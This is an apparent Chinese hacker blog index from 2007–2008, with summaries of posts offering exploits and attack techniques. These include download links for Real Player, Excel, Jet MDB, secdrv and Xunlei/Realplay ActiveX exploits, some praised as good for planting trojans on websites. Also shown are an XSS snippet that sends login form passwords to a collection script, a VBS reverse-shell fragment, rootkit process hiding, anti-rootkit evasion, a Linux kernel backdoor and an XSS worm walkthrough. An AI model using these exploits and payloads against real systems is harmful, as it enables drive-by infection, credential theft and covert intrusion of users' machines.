摘要: 以下方法修改完后，再刷新本頁就能看到上面圖片
Firefox：輸入about:config進入配置頁面，修改network.http.sendRefererHeader的值為1即可（默認是2），
.....
閱讀全文

posted @ 2008-04-08 14:00 009 閱讀(1582) | 評論 (3) | 編輯收藏

Real Player rmoc3260.dll Exp (老C給的，據說好用)

摘要:
milw0rm上的，生成器
lcx給的，稍微改了改代碼，據說好用
未測試，最近忙到自殺的時間都沒有
唉，可惜有馬時候沒洞，有洞時候沒馬，要不就找個站掛上了。

http://www.tkk7.com/Files/baicker/Real........
閱讀全文

posted @ 2008-04-02 23:56 009 閱讀(1798) | 評論 (5) | 編輯收藏

比較solaris-redhat-suse-freebsd20051129（ZT）

posted @ 2008-03-30 15:58 009 閱讀(2470) | 評論 (0) | 編輯收藏

Microsoft Office Excel Code Execution Exploit (MS08-014)

摘要: http://www.milw0rm.com/sploits/2008-zha0_ms08_014.rar

閱讀全文

posted @ 2008-03-22 14:13 009 閱讀(1438) | 評論 (0) | 編輯收藏

膩了，玩點別的

摘要:
貌似花了兩小時

閱讀全文

posted @ 2008-03-15 18:34 009 閱讀(1139) | 評論 (8) | 編輯收藏

沒事多申請專利，你行的，你可以的，你是最棒的

摘要: 開發人員兢兢業業搞研發、開源，商業公司卻拿去申請專利

或許只是看了下面三行，您就忍不住想吐，那么麻煩堅持一下，如果可以的話頂一下日志我會感到萬份榮幸

金山
刪除FAT卷中文件的方法，　　　　　　申請號：200610122249.5
徹底粉碎FAT卷中文件數據的方法，　　申請號：200610122247.6
徹底粉碎NTFS卷中文件數據的方法，　　申請號：200610122479.1
一種Windows平臺下對抗API掛接的方法 http://www.cpsfu.com/G06F/2007/CN1936834.shtml
.............
閱讀全文

posted @ 2008-03-12 16:43 009 閱讀(1508) | 評論 (8) | 編輯收藏

oracle真爛

摘要: 自從orale注入可以執行系統命令后，覺得oracle安全性實在太爛了，容易獲得系統權限，又動不動就死翹翹

昨天給朋友做個滲透測試，稍微掃掃就死了
以前給客戶做滲透測試也經常碰到過oracle死掉的問題
相比MSSQL，估計也就只有巨型數據查詢速度快的優勢了

閱讀全文

posted @ 2008-03-08 19:33 009 閱讀(1551) | 評論 (1) | 編輯收藏

剛玩了會PSP的戰神，不錯的游戲

摘要:

終于下完了眾人期待的大作，PSP只用來看碟好幾年了，今天終于拷個游戲玩玩

雖然還是拜托不了一個穿著性感的肌肉男，拿著怪異的兵器到處殺人（怪）的模式，不過畫面和游戲性都是不錯的說，操作非常爽快（但是我肯定沒耐心玩完）

最近比較墮落，還有些公司的破事（好像談到公司的事都是破事），沒寫什么技術性的文章也沒看什么技術性的文章

閱讀全文

posted @ 2008-03-07 22:13 009 閱讀(1005) | 評論 (3) | 編輯收藏

灰常灰常灰常搞笑的比爾.蓋茨最后一天（視頻）

posted @ 2008-02-22 21:31 009 閱讀(1247) | 評論 (1) | 編輯收藏

缺德的品牌機

摘要:
很多攢機的朋友都知道這個規律
品牌機為了吸引顧客，主要配件的配置會讓你看著很高
為了降低成本，往往有某一個或者幾個配件很“缺德”，要么雜牌，要么很低的配置

朋友一臺式機，老抱怨慢，重裝也不行，看分辯率高點的電影還頓，我問配置，答曰：CPU 2.50G 內存248M（估計256M）

朋友機器聯想的

我就寫明牌子了，咋的
閱讀全文

posted @ 2008-02-21 22:38 009 閱讀(1015) | 評論 (0) | 編輯收藏

用工具下載fs2you資源

摘要: javascript:window.setTimeout=null;showDirectDownload() 閱讀全文

posted @ 2008-02-20 14:04 009 閱讀(3092) | 評論 (3) | 編輯收藏

KmPlayer播放某些DVDRip時候對白聲音小，背景聲音大的解決方法

摘要: 老家的臺式機壞了，好不容易修好了，也沒啥用，就當“碟機”吧，重裝系統，就裝了個winrar和kmplayer
kmplayer播放某些avi文件的時候，對白小到幾乎聽不到，偶爾出現的背景音樂大到嚇人，網上找了很多，準備按照步驟做，發現就沒有提到的解碼方式，我下的是kmplayer帶所有解碼包的版本，估計是沒有注冊。

在命令行到kmplayer的codecs目錄，
執行如下命令：
........
閱讀全文

posted @ 2008-02-19 11:29 009 閱讀(6145) | 評論 (3) | 編輯收藏

滑雪筆記（備忘）

摘要: 犁式（八字）第一次滑就會了，水平到了一定高度，就很難提升，哈哈，今天恨了下心，租了個教練學平行式的，順便糾正了一下以前犁式的BUG
以下備忘，以便下次滑（說不定一年后），省得又花太多時間復習以前的技術
犁式：內八字（緩坡減速，剎車功效），重心在中間，左轉重心在右腳，右轉重心在左腳（慣性原理，總之重心在坡下那只腳，轉彎外側，如果你不是往坡上滑的話），板基本上水平（不是和破面平），刮雪才能起到減速作用，靠板立起的角度控制滑雪速度。
平行式：先從犁式開始，盡量使內側的腳不受力（重心只在一條腿），能提起來，練習多次并逐漸提前抬腳的時間，直到你可以完全用一條滑雪板轉彎，慢慢的收起來和另一只承重腳平行，如左拐，重心在右腳，左腳和右腳平行，要習慣雙腳一高一低的感覺，用腿部的屈伸調解并保持正確的滑行姿勢，轉彎時盡量將外側的膝蓋置于另一只的后側，方便下一次轉換到直滑和轉彎。
滑行過程中，重心前傾，小腿面和鞋梆之間要明顯感覺到壓力，重心稍低，雙手前伸，保持平衡。挪板使之急停感覺應該是腳跟用力往坡下踩，使板橫過來，高速下腿承受很大沖擊力，得慢慢學習。
原地滑行：外八字閱讀全文

posted @ 2008-02-03 23:23 009 閱讀(905) | 評論 (1) | 編輯收藏

今天終于把朋友們的火車票都搞定了

摘要: 總算是公德圓滿

今年票販子加價比票價還高，真是汗
有兩張安檢那里買的，可靠性沒得說
...............
閱讀全文

posted @ 2008-01-31 23:20 009 閱讀(909) | 評論 (1) | 編輯收藏

用C++修改本地安全策略

摘要: 要寫個修改本地安全策略的工具，本以為修改注冊表就行了，沒想到還挺復雜，改策略，對應的注冊表項會變，倒過來，改對應的注冊表項，策略沒變，郁悶
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account] |--------------------------------修改次數
"F"=hex:02,00,01,00,00,00,00,00,e0,7c,9e,21,1a,12,c6,01,43,00,00,00,00,00,00,\ 00 ~ 22
00,00,80,d2,16,47,b9,ff,ff,00,80,2c,ab,6d,fe,ff,ff,00,00,00,00,00,00,00,80,\ 23 ~ 47
00,cc,1d,cf,fb,ff,ff,ff,00,cc,1d,cf,fb,ff,ff,ff,00,00,00,00,00,00,00,00,f1,\ 48 ~ 72
03,00,00,00,00,00,00,02,00,18,00,00, 閱讀全文

posted @ 2008-01-30 13:30 009 閱讀(3462) | 評論 (4) | 編輯收藏

一段有趣的腳本

摘要: 任何網站,打開后(有圖片的),瀏覽器輸入

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
閱讀全文

posted @ 2008-01-21 19:39 009 閱讀(1534) | 評論 (3) | 編輯收藏

新手編譯驅動

摘要: 網上找了N多資料,說得我暈頭轉向的,都是TMD資深顧問級別的文章,最后簡單幾步也可以搞定,過程如下:

我的SDK本來就是裝好的,再裝個DDK,就是重裝系統,只要DDK目錄還在,重新指定下即可,不用重裝DDK
DDK目錄為: f:\WINDDK\3790.1830

以下以HelloWorld為例
-----------------------------------------HelloWorld.h---------------------------------------------------
#ifndef __HELLOWORLD_H__
#define __HELLOWORLD_H__
#include
.................
閱讀全文

posted @ 2008-01-08 16:20 009 閱讀(2557) | 評論 (7) | 編輯收藏

簡單認識Anti-RootKit(ZT)

摘要: 現在RK（rootkit）和ARK(anti- rootkit)的斗爭已經進行了很久，在印象中最早出來的ARK工具是冰刃(IceSword)，從冰刃開始出來到現在RK和ARK的斗爭一直在繼續，目前冰刃還是在流行當中，自己感覺也正是冰刃的出來才帶動了當前流行的RK和ARK的斗爭呵呵，現在很多病毒木馬已經廣泛的帶有驅動,使用一些RK的技術和方法使自己更底層些更強大些，當前流行的ARK工具主要包括：隱藏進程檢測，內核驅動檢測，SSDT檢測，代碼HOOK檢測，注冊表隱藏的檢測，隱藏文件的檢測等一些功能的，下面談談自己對一些功能的簡單愚見嘻嘻。
..........
閱讀全文

posted @ 2007-12-29 15:09 009 閱讀(1888) | 評論 (1) | 編輯收藏

無恥的驅動加載法(ZT)

摘要: 方法一：替換win32k.sys
在2k3的系統下ZwSetSystemInformation禁止了用戶模式下加載驅動，只允許SMSS.exe加載win32k.sys。于是我們可以利用一下這個特點：
1. 注入SMSS.EXE
2. 打開SeLoadDriverPrivilege權限
3. 把原始的win32k.sys改名
4. 復制我們的驅動到\systemroot\system32下
5. 在SMSS.EXE中加載\\SystemRoot\\System32\\win32k.sys
6. 把\\SystemRoot\\System32\\win32k.sys改名
7. 把原始的win32k.sys文件改名改回去
..............
閱讀全文

posted @ 2007-12-29 14:59 009 閱讀(2310) | 評論 (0) | 編輯收藏

實例解析蠕蟲病毒的原理(ZT)

摘要: 　　一、蠕蟲病毒具有自我復制能力

　　我們以普通的VB腳本為例來看看：
JavaScript代碼

1. Set objFs=CreateObject ("Scripting.FileSystemObject")
2. '創建一個文件系統對象
3. objFs.CreateTextFile ("C:\virus.txt", 1)
4. '通過文件系統對象的方法創建了一個TXT文件。
.....................
閱讀全文

posted @ 2007-12-28 15:44 009 閱讀(1875) | 評論 (1) | 編輯收藏

軟件漏洞分析入門[初級shellcode_定位緩沖區](ZT)

摘要: 跟貼中看到已經有不少朋友成功的完成了前面的所有例題，今天我們在前面的基礎上，繼續深入。每一講我都會引入一些新的知識和技術，但只有一點點，因為我希望在您讀完貼之后就能立刻消化吸收，這是標準的循序漸進的案例式學習方法

另外在今天開始之前，我順便說一下后面的教學計劃：

我會再用3～4次的講座來闡述shellcode技術，確保大家能夠在比較簡單的漏洞場景下實現通用、穩定的溢出利用程序（exploit）
..........
閱讀全文

posted @ 2007-12-28 15:41 009 閱讀(2759) | 評論 (0) | 編輯收藏

軟件漏洞分析入門[初級棧溢出D_植入任意代碼](ZT)

摘要: 麻雀雖小，五臟俱全

如果您順利的學完了前面4講的內容，并成功的完成了第2講和第4講中的實驗，那么今天請跟我來一起挑戰一下劫持有漏洞的進程，并向其植入惡意代碼的實驗，相信您成功完成這個實驗后，學習的興趣和自信心都會暴增。

開始之前，先簡要的回答一下前幾講跟貼中提出的問題

代碼編譯少頭文件問題：可能是個人習慣問題，哪怕幾行長的程序我也會丟到project里去build，而不是用cl，所以沒有注意細節。如果你們嫌麻煩，不如和我一樣用project來build，應該沒有問題的。否則的話，實驗用的程序實在太簡單了，這么一點小問題自己決絕吧。另外，看到幾個同學說為了實驗，專門恢復了古老的VC6.0，我也感動不已啊，呵呵。
...............
閱讀全文

posted @ 2007-12-28 15:40 009 閱讀(2298) | 評論 (1) | 編輯收藏

軟件漏洞分析入門[初級棧溢出C_修改程序流程](ZT)

摘要: 上節課沒有操練滴東西，不少蠢蠢欲動的同學肯定已經坐不住了。悟空，不要猴急，下面的兩堂課都是實踐課，用來在實踐中深入體會上節課中的知識，并且很有趣味性哦

信息安全技術是一個對技術性要求極高的領域，除了扎實的計算機理論基礎外、更重要的是優秀的動手實踐能力。在我看來，不懂二進制就無從談起安全技術。

緩沖區溢出的概念我若干年前已經了然于胸，不就是淹個返回地址把CPU指到緩沖區的shellcode去么。然而當我開始動手實踐的時候，才發現實際中的情況遠遠比原理復雜。
................
閱讀全文

posted @ 2007-12-28 15:39 009 閱讀(1517) | 評論 (0) | 編輯收藏

軟件漏洞分析入門[初級棧溢出B_系統棧原理](ZT)

摘要: 掃盲班第三講開課啦！
上節課我們用越過數組邊界的一個字節把鄰接的標志變量修改成0，從而突破了密碼驗證程序。您實驗成功了嗎？沒有的話回去做完實驗在來聽今天的課！

有幾個同學反映編譯器的問題，我還是建議用VC6.0，因為它build出來的PE最適合初學者領會概念。而且這門課動手很重要，基本上我的實驗指導都是按VC6.0來寫的，用別的build出來要是有點出入，實驗不成功的話會損失學習積極性滴——實驗獲得的成就感是學習最好的動力。
............
閱讀全文

posted @ 2007-12-28 15:34 009 閱讀(1659) | 評論 (0) | 編輯收藏

軟件漏洞分析入門[初級棧溢出A_初識數組越界](ZT)

摘要: 本想來點大道理申明下研究思路啥的，看到大家的熱情期待，稍微調整一下講課的順序。從今天開始，將用3～4次給大家做一下棧溢出的掃盲。

棧溢出的文章網上還是有不少的（其實優秀的也就兩三篇），原理也不難，讀過基本上就能夠明白是怎么回事。本次講解將主要集中在動手調試方面，更加著重實踐。

經過這3～4次的棧溢出掃盲，我們的目標是：

領會棧溢出攻擊的基本原理
能夠動手調試簡易的棧溢出漏洞程序，并能夠利用漏洞執行任意代碼（最簡易的shellcode）
.............
閱讀全文

posted @ 2007-12-28 15:33 009 閱讀(1467) | 評論 (3) | 編輯收藏

軟件漏洞分析入門[引子](ZT)

摘要: 您是否夢想過能夠像電影上演的那樣黑進任意一臺機器遠程操控？您的夢想是否曾經被書店里邊滿架子的反黑，防毒，擒木馬的掃盲書強暴的體無完膚？

從今天開始，準備陸續發一系列關于軟件漏洞方面基礎知識的帖子，包括軟件漏洞的研究價值，研究方法，堆棧利用的基礎知識，shellcode的調試方法，漏洞調試方法，漏洞分析，漏洞挖掘，軟件安全性測試等等，此外還將介紹一些metasploit架構和fuzz測試方面的入門知識。

軟件漏洞分析，利用，發掘是當今安全技術界中流砥柱級別話題，如果您關注過black hat或者defcon之類的頂級安全技術峰會的話，就知道我不是在吹牛了。可惜的是這方面的中文資料很少，偶爾有一篇比較優秀的文章但又不夠系統，目前為止也沒有形成像破解技術這樣的討論風氣，菜鳥們在黑燈瞎火的夜晚瞎折騰，沒有交流和指導，興趣就像被拔了氣彌兒芯的車胎，很快就泄氣了。

雖然漏洞分析與利用與破解在技術上各有側重點，但逆向基礎是共同的。以我個人的經驗，能做crack的朋友只要稍加進修就能入門。就算沒有任何匯編基礎和逆向經驗的朋友也不用擔心，因為這閱讀全文

posted @ 2007-12-28 15:32 009 閱讀(1307) | 評論 (3) | 編輯收藏

對 Hook 內核ntoskrnl'sZwQuerySystemInformation隱藏任務管理器進程名的一點完善(ZT)

摘要: 通過hook ssdt中的ZwQuerySystemInformation來實現隱藏進程已經是很老的技術了。
qiweixue 在他的文章里面寫的很清楚了:
http://bbs.pediy.com/showthread.php?t=36742&highlight=%E9%9A%90%E8%97%8F+%E8%97%8F%E8%BF%9B+%E8%BF%9B%E7%A8%8B

不過他的文章里面，進程名字是直接寫死的，不能通過三層進行傳遞，而且得到ZwQuerySystemInformation是通過匯編的方法，這樣在其他系統上可能會有問題，所以我做了一些改善如下：
1 通過應用程序將進程名字傳遞進來，可以傳遞多個進程名字，格式為：qq.exe;taskmgr.exe;
2 通用的方法來得到ZwQuerySystemInformation的地址，不過這個方法都是從rookit上得來的。
...........
閱讀全文

posted @ 2007-12-27 22:12 009 閱讀(2150) | 評論 (0) | 編輯收藏

讓EXE導出函數(ZT)

摘要: 偶然發現OllyDBG.exe導出了一堆函數，這些函數都是供其插件調用的。對這種體系結構很感
興趣，想弄清楚它的實現原理。后來又看到梁肇新的書《編程高手箴言》第278頁提到的調用
門，覺得都應該差不多。

三種不同的解決辦法（原理可能是一樣的，:)）：

1）在導出函數聲明之前加上__declspec(dllexport)。例：
__declspec(dllexport) int Add(int a, int b);
__declspec(dllexport) int Sub(int a, int b);
__declspec(dllexport) int Mul(int a, int b);
__declspec(dllexport) int Div(int a, int b);
..........
閱讀全文

posted @ 2007-12-27 22:11 009 閱讀(1722) | 評論 (0) | 編輯收藏

icesword 驅動部分分析(ZT)

摘要: icesword.exe 在執行的時候會放出一個驅動程序 ispubdrv.sys .
icesword.exe 裝載這個驅動，這個驅動安裝后就不會卸載。直到系統重新啟動。這可能是因為驅動中調用了
PsSetCreateThreadNotifyRoutine 函數.下面是這個函數在 ddk 中的介紹。
........
閱讀全文

posted @ 2007-12-27 22:01 009 閱讀(688) | 評論 (0) | 編輯收藏

利用偽造內核文件來繞過IceSword的檢測(ZT)

摘要: 一、為什么需要偽造內核：

IceSword（以下簡稱IS）為了防止一些關鍵系統函數（包括所有服務中斷表中的函數以及IS驅動部分要使用到的一些關鍵函數）被 patch，它直接讀取內核文件（以下簡稱“ntoskrnl.exe”），然后自己分析ntoskrnl.exe 的PE結構來獲取關鍵系統函數的原始代碼并且把當前內核中所有的關鍵系統函數還原為windows默認狀態，這樣保證了IS使用到的函數不被patch 過。也許你會想如果我們把還原后的函數再進行patch不還是能躲的過去嗎？筆者也試過
.....................
閱讀全文

posted @ 2007-12-27 21:58 009 閱讀(925) | 評論 (0) | 編輯收藏

WIN下獲取kernel基址的shellcode探討(ZT)

摘要: [經典溢出攻擊流程]
———————————
1. 查找Kernel32.dll基地址；
2. 查找GetProcAddress()函數地址；
3. 查找其它API函數地址；
4. CreateProcess()；
5. 遠程連接。

我們都知道WINDOWS的系統功能不像UNIX的系統調用那樣實現，由于WINDOWS版本的不斷更新，使得系統調用對SHELLCODE幾乎起不到作用。
但是WINDOWS是靠DLL動態鏈接庫來實現，這就是說，如果能從KERNEL32.DLL中獲取LoadLibrary()和GetProcAddress()函數的地址，我們就可以調用WINDOWS下的所有函數了。
所以我們需要對KERNEL32.DLL進行地址定位，這也是本文的目的。
................
閱讀全文

posted @ 2007-12-27 21:43 009 閱讀(1431) | 評論 (0) | 編輯收藏

SEH源碼賞析之C篇(ZT)

摘要:
1.起因
C++程序員對try,catch,throw都應該很熟悉,能知道VC怎么實現它的人就不多了,不過網絡世界使很多人知道了它與SEH (structured exception handling）有密切關系,我也不例外,也是在若干年前從網絡知道了SEH,并且大致也知道SEH的流程.但是和多數人一樣在我的實踐也很少直接使用 SEH,對SEH也就僅限于網絡上一些文章的介紹.曾經在用Windbg對某些軟件作分析,我遇到了斷點失效的情況,查找資料介紹是SEH中的 Handler清除了調試寄存器,在分析.....................
閱讀全文

posted @ 2007-12-27 21:36 009 閱讀(1214) | 評論 (1) | 編輯收藏

饒過現代Anti-Rookit工具的內核模塊掃描(ZT)

摘要: 本文描述了一些方法，可以饒過目前主流的現代Anti-rootkit工具，包括但不限于:
Icesword 最新版
Gmer最新版
Rootkit unhooker 最新版
DarkSpy 最新版
AVG Anti-rootkit最新版
等等
................
閱讀全文

posted @ 2007-12-27 21:32 009 閱讀(495) | 評論 (0) | 編輯收藏

TCP版backshell的VBS腳本

摘要: '搞一個特殊的站準備用的，沒想到，等寫完了，洞補上了，郁悶
'by 009, baicker@hotmail.com
'date:071221

Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234
................

閱讀全文

posted @ 2007-12-22 16:19 009 閱讀(1116) | 評論 (0) | 編輯收藏

在同一個進程空間運行兩個程序(ZT)

摘要:
　　眾所周知，bo2k可以在一個指定的進程空間(比如explorer.exe進程)做為一個線程運行。本文試圖找出一種方法，使得任意exe都可以在其他進程中以線程運行(當然，這里說的"任意"是有條件的，下面會講到)。
　　為行文簡單起見，我把先加載的exe稱為宿主，后加載的exe稱為客戶。對于上面的例子，explorer.exe為宿主，bo2k.exe為客戶。
基本知識
　　每一個exe都有一個缺省加載基址，一般都是0x400000。如果實際加載基址和缺省基址相同，程序中的重定位表就不需要修正(fixup),否則，就必須修正重定位表；

閱讀全文

posted @ 2007-12-20 14:36 009 閱讀(1185) | 評論 (0) | 編輯收藏

Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability for xp 2k3 (fixed)

摘要: 之前的反彈sc有問題，請重新下載測試（071218）
閱讀全文

posted @ 2007-12-18 12:23 009 閱讀(942) | 評論 (0) | 編輯收藏

Windows Local Privilege Escalation Vulnerability Exploit(secdrv) for winxp & win2k3

摘要: secdrv local exp
winxp cn sp2, win2k3 cn sp1 測試通過

之前的版本只能xp下用，這個2k3也可以了，其實前段時間朋友給過我一個這個漏洞的1day，但是朋友的東西不能亂發，這個是自己寫的，發出來大家惡心一下。閱讀全文

posted @ 2007-12-17 16:34 009 閱讀(1577) | 評論 (6) | 編輯收藏

收到同學寄給我的情書

posted @ 2007-12-15 21:58 009 閱讀(1092) | 評論 (2) | 編輯收藏

Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability for xp 2k3

摘要: Win2k3_CN SP1 msjet40.dll ver 4.0.9025.0 測試成功
WinXP_CN SP2 msjet40.dll ver 4.0.8618.0 測試成功

mdb_d_exp.exe 為debug版本
mdb_r_exp.exe 為relrease版本
之前的反彈sc有問題，請重新下載測試（071218）

閱讀全文

posted @ 2007-12-01 06:29 009 閱讀(1276) | 評論 (10) | 編輯收藏

搞定MDB最新溢出for win2003

posted @ 2007-11-30 03:14 009 閱讀(1088) | 評論 (0) | 編輯收藏

MS07-017 windows 2000 and windows xp sp2 真正修改能用版本(fixed)

摘要: 注：Windows2000_CN SP2(我只有這臺SP2的2k測試機)，WindowsXP_CN SP2測試通過
網上流傳的都TMD垃圾不能用，不知道抄來抄去轉來轉去哪些代碼轉錯了

這個是我自己修改過的
閱讀全文

posted @ 2007-11-26 22:47 009 閱讀(1050) | 評論 (2) | 編輯收藏

Windows Local Privilege Escalation Vulnerability Exploit

摘要: 小改了一下代碼，這下好用了

WinXP_CN SP2測試通過
Win2k3測試藍屏，注意保存文件哦閱讀全文

posted @ 2007-11-26 18:46 009 閱讀(1479) | 評論 (2) | 編輯收藏

Realplay ActiveX 0day 利用工具

摘要: 注：Windows2003_CN SP1 / WindowsXP_CN SP2 + RealPlay10.0 測試通過
好像10.5以下版本都中，這個似乎只能溢出一次，第一次溢出成功后，第二次開始會有realplay修復數據庫的提示，點修復就中，取消不中

上次測試使用的"Windows 按鈕突破專家" 4.5K 溢出沒問題，但是"iecv.exe"那個87K
溢出的時候老是看不到界面，其實已經執行（進程中可以看到），不知道為什么(不知道是否大小問題)

另：IE5不中，代碼中直接跳過了
閱讀全文

posted @ 2007-11-25 20:25 009 閱讀(789) | 評論 (7) | 編輯收藏

迅雷5 0day 利用工具

摘要: 迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影響
掛馬相當好用，只是如果用iframe，寬高不能為0
（pplayer.dll 組件版本號：1.2.3.49，CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F）
閱讀全文

posted @ 2007-11-25 20:19 009 閱讀(640) | 評論 (0) | 編輯收藏

PSP 3.52 M33-2 播放UMD Video ISO(備忘)

posted @ 2007-11-23 11:05 009 閱讀(1116) | 評論 (0) | 編輯收藏

JavaScript加密解密7種方法

摘要: 本文一共介紹了七種javascript加密方法：

　　在做網頁時（其實是網頁木馬呵呵），最讓人煩惱的是自己辛辛苦苦寫出來的客戶端IE運行的javascript代碼常常被別人輕易的拷貝，實在讓自己的心里有點不是滋味，要知道自己寫點東西也挺累的......^*^

　　但我們也應該清楚地認識到因為javascript代碼是在IE中解釋執行，要想絕對的保密是不可能的，我們要做的就是盡可能的增大拷貝者復制的難度，讓他知難而退（但愿~!~），下面我結合自己這幾年來的實踐，及個人研究的心得，和大家一起來探討一下網頁中javascript代碼的加密解密技術。

　　以加密下面的javascript代碼為例：
......

閱讀全文

posted @ 2007-11-16 13:42 009 閱讀(939) | 評論 (0) | 編輯收藏

Unicode編碼表/0000-0FFF

posted @ 2007-11-16 10:24 009 閱讀(19451) | 評論 (3) | 編輯收藏

VC編譯優化設置

摘要: VC- Project Setting-Debug-Project Option語法解釋

-優化-
/O1 最小化空間 minimize space
/Op[-] 改善浮點數一致性 improve floating-pt consistency
/O2 最大化速度 maximize speed
/Os 優選代碼空間 favor code space
/Oa 假設沒有別名 assume no aliasing
/Ot 優選代碼速度 favor code speed
/Ob 內聯展開（默認 n=0） inline expansion (default n=0)
/Ow 假設交叉函數別名 assume cross-function aliasing
/Od 禁用優化（默認值） disable optimizations (default)
/Ox 最大化選項。(/Ogityb2 /Gs) maximum opts. (/Ogityb1 /Gs)
/Og 啟用全局優化閱讀全文

posted @ 2007-11-16 10:20 009 閱讀(1896) | 評論 (0) | 編輯收藏

autorun.inf完全操作手冊(ZT)

摘要: 一、autorun.inf是windows下操縱光盤行為的一個文件，需要放在光盤根目錄下，部分操作對于硬盤也適用。
二、autorun.inf是可以被禁止的。方法如下：
點擊開始->運行，在文本框中輸入regedit或者regedt32。依次展開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer，其中的NoDriveTypeAutoRun子鍵限制著Autorun的作用范圍，默認為95（16進制）。
................
閱讀全文

posted @ 2007-11-16 10:16 009 閱讀(598) | 評論 (0) | 編輯收藏

Flash純腳本生成餅圖(ZT)

posted @ 2007-11-16 10:09 009 閱讀(443) | 評論 (0) | 編輯收藏

清空代碼防止查看源代碼(ZT)

posted @ 2007-11-16 09:45 009 閱讀(562) | 評論 (0) | 編輯收藏

一些XSS小技巧(ZT)

摘要: 1.最短的動態插入JS.
代碼:
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>

2.獲取表單密碼.
代碼:
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php"+this.username.value+"&"+this.password.value;this.submit();}};
.......

閱讀全文

posted @ 2007-11-08 13:11 009 閱讀(1491) | 評論 (0) | 編輯收藏

程序多開器

摘要: 使用OD反匯編修改NateOn，雖然很麻煩，最終還是搞定了，后來發現網上有段代碼，直接可以實現程序多開，測試了MSN、NateOn沒問題，代碼如下：

.386
.model flat, stdcall
option casemap :none

include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
............

閱讀全文

posted @ 2007-11-07 16:54 009 閱讀(774) | 評論 (0) | 編輯收藏

完整XSS wrom入侵流程(ZT)

摘要: 不說廢話，且看怎么實現，我先拿SOHU BLOG做示范.

1.測試過濾字符,下面都是構造XSS所需要的關鍵字符(未包含全角字符,空格是個TABLE,\/前是真正的空格),在個人檔案處看過濾了哪些.
’’;:!--"<javascript JAvaSCriPT>=&#{()} \/
結果
’’;:!--"=&#{()} // (&后是amp,論壇過濾了)
.........
閱讀全文

posted @ 2007-11-07 10:53 009 閱讀(443) | 評論 (0) | 編輯收藏

一個簡單的Linux內核后門原型(ZT)

摘要: 這是一個在內核模塊中實現的反連后門，大家看看這于應用層上的實現有什么不同吧，呵呵
/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt <wzt#xsec.org>
*
*/
閱讀全文

posted @ 2007-10-25 12:20 009 閱讀(562) | 評論 (0) | 編輯收藏

VBS解決終端窗口中特殊快捷鍵問題

摘要: 寫程序麻煩，還要傳上去，幸好VBS每臺服務器應該都可以運行的吧，很少會又禁止的
使用SendKeys搞定
例如呼出Cain使用果如下腳本：）
Set WshShell= Wscript.CreateObject("Wscript.Shell")
Wscript.Sleep 1500
WshShell.SendKeys "%{PGUP}"

以下位SendKeys的相關使用方法等
............

閱讀全文

posted @ 2007-10-15 17:27 009 閱讀(1144) | 評論 (1) | 編輯收藏

一些opcodes(ZT)

摘要:
一些opcodes
by axis
2007-03-28

近日在寫exploit的時候需要用到一些其他語言的call ebx的跳轉地址，但是metasploit的opcode DB沒有包括繁體中文、日文、韓文機器的跳轉地址，所以費了點時間收集了下，在這里要感謝傲少提供的機器給我去找地址。現在貼到這里，方便大家。

簡體中文windows的通用跳轉地址：(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..................
閱讀全文

posted @ 2007-10-11 15:49 009 閱讀(435) | 評論 (0) | 編輯收藏

利用Radmin漏洞修改的Hash登錄版本

摘要: 更新：上次比較匆忙，有個函數沒改好，今天才可以上網，現在沒問題了
前段時間出了個radmin的算是技巧吧(http://www.tkk7.com/baicker/archive/2007/09/12/144609.html)，以前也有過這個想法，只是沒有去研究，這次索性修改了下源文件，直接改成利用hash登錄的版本，省得每次帶個od跑，針對屏幕相關的似乎不行，不過已經夠用了呵呵
注：hash用小寫字母（懶得改了）
http://www.tkk7.com/Files/baicker/Radmin_Hash.rar

閱讀全文

posted @ 2007-09-29 15:36 009 閱讀(4667) | 評論 (11) | 編輯收藏

Technical explanation of The MySpace Worm

摘要: Please note that this code and explanation was only released AFTER MySpace resolved this.
None of this would work on MySpace at the time it was released and it will not work now. Otherwise, there would have been mayhem.
Now, let's talk more about the problems encountered, workarounds, and how it worked in general.
1) Myspace blocks a lot of tags. In fact, they only seem to allow <a>, <img>s, and <div>s...maybe a few others (<embed>'s, I think). They would 閱讀全文

posted @ 2007-09-20 18:32 009 閱讀(649) | 評論 (0) | 編輯收藏

用ansi語法美化你的winrar和win啟動界面

摘要: "←"為ESC代碼 ^YzFEu $
在用EDIT編輯批處理文件時可用下列方法輸入ESC字符.首先同時按下Ctrl和P鍵 \?)@ #Qs
然后再按下作方括號,此時屏幕出現一左箭頭,說明已輸入了ESC字符.之后必須放 Jq)!)={
開Ctrl再次按下方括號鍵開始ANSI命令.
ESC[Ps;...;Psm
設置圖形模式：調用由下列數值指定的圖形函數，在該序列再次出現之前，這些被指定的函數保持激活狀態。圖形模式改變屏幕上顯示的顏色和文本（例如：黑體和下劃線字體）屬性。

文本屬性

值功能
------------------------------------
0 無屬性
1 黑體
4 下劃線字體（僅適用于單色顯示適配器）
5 閃爍字體
..........
閱讀全文

posted @ 2007-09-18 15:05 009 閱讀(277) | 評論 (0) | 編輯收藏

三只熊

摘要:

2007年8月17日

公告

常用鏈接

留言簿(113)

隨筆分類

隨筆檔案

文章分類

相冊

Link

搜索

最新評論

